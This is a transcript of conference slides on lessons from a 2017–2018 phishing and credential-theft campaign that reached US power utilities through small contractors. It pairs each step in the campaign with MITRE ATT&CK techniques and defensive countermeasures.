…but your customers are the target...case #2 commandeered email account (mr. vitello, all-ways...
TRANSCRIPT
YOU’VE BEEN PWNED……but your customers are
the target
Lessons learned from attacks against the power grid.
Christopher HickernellSecurity Architect
linkedin.com/in/christopherhickernell
@cahickernell17 years of experience
B.S. Information Systems
M.S. Information Security
CISSP, CCSP, GSLC, CCNA R&S, CCNA Security, Security+
Source Article
THE WALL STREET JOURNAL
Published Jan 10, 2019
By Rebecca Smith and Rob Barry
3
Source Article
THE WALL STREET JOURNAL
Published Jan 10, 2019
By Rebecca Smith and Rob Barry
4
Source Article
THE WALL STREET JOURNAL
Published Jan 10, 2019
By Rebecca Smith and Rob Barry
5
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
Late JUNEDECEMBER
2016 2017
APRIL
2017 2017 2017
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
Late JUNEDECEMBER
2016 2017
APRIL
2017 2017 2017
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Late JUNEDECEMBER
2016 2017
APRIL
2017 2017 2017
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Late JUNEDECEMBER
2016 2017
Corvallis, Ore.-based firm is compromised
APRIL
2017 2017 2017
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Late JUNEDECEMBER
2016 2017
Corvallis, Ore.-based firm is compromised
APRIL
2017 2017 2017
Corvallis network and fake email persona used to phish
DeVange Construction
Fake DeVange email used to send malicious attachments
to utilities
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Kauffman mailbox used to send 2,300 phishing emails containing
a fake Dropbox link
Late JUNEDECEMBER
2016 2017
Corvallis, Ore.-based firm is compromised
APRIL
2017 2017 2017
Corvallis network and fake email persona used to phish
DeVange Construction
Fake DeVange email used to send malicious attachments
to utilities
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Kauffman mailbox used to send 2,300 phishing emails containing
a fake Dropbox link
Power Grid compromised
Late JUNEDECEMBER
2016 2017
Corvallis, Ore.-based firm is compromised
APRIL
2017 2017 2017
Corvallis network and fake email persona used to phish
DeVange Construction
Fake DeVange email used to send malicious attachments
to utilities
Attack Timeline
2017
Early MARCH
2018
Late MARCH Early JUNE OCTOBER
“Control Engineering” website hacked to capture visitor’s
passwords
All-Ways Excavating email compromised
All-Ways customers are phished, directing them
to another credential harvesting website
Dan Kauffman Excavating is compromised
Kauffman mailbox used to send 2,300 phishing emails containing
a fake Dropbox link
Power Grid compromised
Late JUNEDECEMBER
2016 2017
Corvallis, Ore.-based firm is compromised
APRIL
Attackers still active
2017 2017 2017
Corvallis network and fake email persona used to phish
DeVange Construction
Fake DeVange email used to send malicious attachments
to utilities
CASE STUDIES
Case #1Malicious file uploaded onto the website for trade journals (CFE Media LLC).
Website code harvested usernames and passwords from visitors.
MITRE ATT&CK
Initial Access: Exploit Public-
facing Application
Countermeasure
File Integrity Checking
Application Isolation
Web application firewall
Log monitoring
Target
Website for trade journals
Case #2Commandeered email account (Mr. Vitello, All-Ways Excavating USA) was used to send messages to customers. Message sent recipients to a malicious website (imageliners.com) that looked like Dropbox.
MITRE ATT&CK
Persistence: Valid
accounts
Countermeasure
Email filtering
Multi-factor authentication
Expiring passwords
Target
Business Email
Case #3Mr. Vitello's email account was used by the attackers multiple times, even responding to customer's inquiries about the strange messages they were receiving from Mr. Vitello.
MITRE ATT&CK
Persistence: Valid
accounts
Countermeasure
Incident Response
Clean-up and prevention
Target
Business Email
Case #4Harvested credentials were used to gain access to Corvallis network and attackers modified the Internet firewall, undetected.
MITRE ATT&CK
Persistence: Valid
accounts
Countermeasure
Monitor system changes
Target
Network Firewall
Case #5Attackers accessed the Corvallis network multiple times from foreign countries (Turkey, France, Netherlands).
MITRE ATT&CK
Persistence: Valid
accounts
Countermeasure
Geo-fencing
Geo-blocking
Target
Corporate Network
Case #6Attackers visited corporate VPN login pages.
MITRE ATT&CK
Initial Access:External Remote
Services
Persistence: Valid accounts
Countermeasure
Multi-factor authentication
Target
VPN Login
Case #7Attackers used fake personas to send emails to utility companies with malicious attachments (resumes).
MITRE ATT&CK
Persistence:Create Account
Persistence: Valid accounts
Countermeasure
Email Security(Spam, Anti-spoof, Anti-malware,
Sandbox, URL Re-writing)
End-user Awareness
Client Security
Target
Business Email
Case #8Attackers penetrated the control-system area of utilities through poorly protected jump boxes.
MITRE ATT&CK
Persistence: Valid accounts
Lateral Movement:Remote Desktop
Protocol
Countermeasure
Endpoint Security
Detection & Response
Secure Baseline Configuration
Target
Endpoint
Case #9All-Ways Excavating was again hacked. Industry experts say Russian government hackers likely remain inside some systems, undetected and awaiting further orders.
MITRE ATT&CK
Persistence: Valid accounts
Persistence:Account
Manipulation
Countermeasure
Incident response
User Behavior Analysis
Deception
Honeypot/Honeynet/Honeycred
Target
Business Network
QuestionsStories
Tech
In a cyber world,every business can be targeted.
So…Be Brilliant
onThe Basics